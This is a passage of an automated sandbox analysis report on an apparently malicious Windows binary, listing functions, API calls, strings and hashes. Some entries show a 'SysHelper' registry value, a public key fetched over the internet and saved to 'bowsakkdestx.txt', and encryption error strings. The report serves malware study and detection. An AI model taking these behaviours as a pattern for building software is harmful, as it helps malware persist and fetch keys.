                                                                                                  • API ID: _malloc$__except_handler4_fprintf
                                                                                                  • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                  • API String ID: 1783060780-3771355929
                                                                                                  • Opcode ID: 779349bd5cffae9da37cda92e0556b786322a556b4ba80c6d8d46dbb3173291c
                                                                                                  • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                                  • Opcode Fuzzy Hash: 779349bd5cffae9da37cda92e0556b786322a556b4ba80c6d8d46dbb3173291c
                                                                                                  • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                  • API String ID: 909875538-2908105608
                                                                                                  • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                  • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                                  • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                  • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                  • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseValue$OpenQuery
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                  • API String ID: 3962714758-1667468722
                                                                                                  • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                  • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                                  • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                  • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0041E707
                                                                                                    • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                  • InternetOpenW.WININET ref: 0041E743
                                                                                                  • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                  • _memmove.LIBCMT ref: 0041E838
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                  • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                  • _strstr.LIBCMT ref: 0041EA36
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                  • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                  • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                  • _malloc.LIBCMT ref: 0041EB86
                                                                                                  • _memset.LIBCMT ref: 0041EB94
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                  • _strstr.LIBCMT ref: 0041EBDA
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                  • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                  • API String ID: 2805819797-1771568745
                                                                                                  • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                  • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                                                                                  • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                  • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                  • API String ID: 1302938615-3129329331
                                                                                                  • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                  • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                                  • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                  • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004306EC Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___unDName.LIBCMT ref: 0043071B
                                                                                                  • _strlen.LIBCMT ref: 0043072E
                                                                                                  • __lock.LIBCMT ref: 0043074A
                                                                                                  • _malloc.LIBCMT ref: 0043075C
                                                                                                  • _malloc.LIBCMT ref: 0043076D
                                                                                                  • _free.LIBCMT ref: 004307B6
                                                                                                    • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                                                                                                  • _free.LIBCMT ref: 004307AF
                                                                                                    • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3704956918-0
                                                                                                  • Opcode ID: 32e7d4c3d8e68485970837e3b5b585c67490908ba1c4539466c19c6bf2906932
                                                                                                  • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                                                                                                  • Opcode Fuzzy Hash: 32e7d4c3d8e68485970837e3b5b585c67490908ba1c4539466c19c6bf2906932
                                                                                                  • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM ref: 00411B1E
                                                                                                  • timeGetTime.WINMM ref: 00411B29
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                                                                                                  • DispatchMessageW.USER32(?), ref: 00411B5C
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                                                                                                  • Sleep.KERNEL32(00000064), ref: 00411B72
                                                                                                  • timeGetTime.WINMM ref: 00411B78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3697694649-0
                                                                                                  • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                  • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                                  • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                  • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00425141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __init_pointers.LIBCMT ref: 00425141
                                                                                                    • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                                                                                    • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                                                                                    • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                                                                                  • __mtinitlocks.LIBCMT ref: 00425146
                                                                                                  • __mtterm.LIBCMT ref: 0042514F
                                                                                                    • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                                                                                    • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                                                                                    • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                                                                                  • __calloc_crt.LIBCMT ref: 00425174
                                                                                                  • __initptd.LIBCMT ref: 00425196
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3567560977-0
                                                                                                  • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                  • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                                                                                  • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                  • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004253AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 0042594A
                                                                                                    • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                    • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                    • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                  • _free.LIBCMT ref: 00425970
                                                                                                    • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  • __lock.LIBCMT ref: 00425989
                                                                                                  • ___removelocaleref.LIBCMT ref: 00425998
                                                                                                  • ___freetlocinfo.LIBCMT ref: 004259B1
                                                                                                  • _free.LIBCMT ref: 004259C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                  • String ID:
                                                                                                  • API String ID: 626533743-0
                                                                                                  • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                  • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                                                                                  • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                  • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                  • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                  • API String ID: 601868998-2416195885
                                                                                                  • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                  • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                                  • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                  • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                                  • API String ID: 2102423945-3653307630
                                                                                                  • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                  • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                                  • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                  • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004C5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                                    • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                                                                                    • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                                    • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                                    • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                                    • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                                                                                  • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                                  Strings
                                                                                                  • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                  • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                  • API String ID: 3123740607-798102604
                                                                                                  • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                  • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                                  • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                  • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _fprintf_memset
                                                                                                  • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                  • API String ID: 3021507156-3399676524
                                                                                                  • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                  • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                                  • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                  • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                  • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
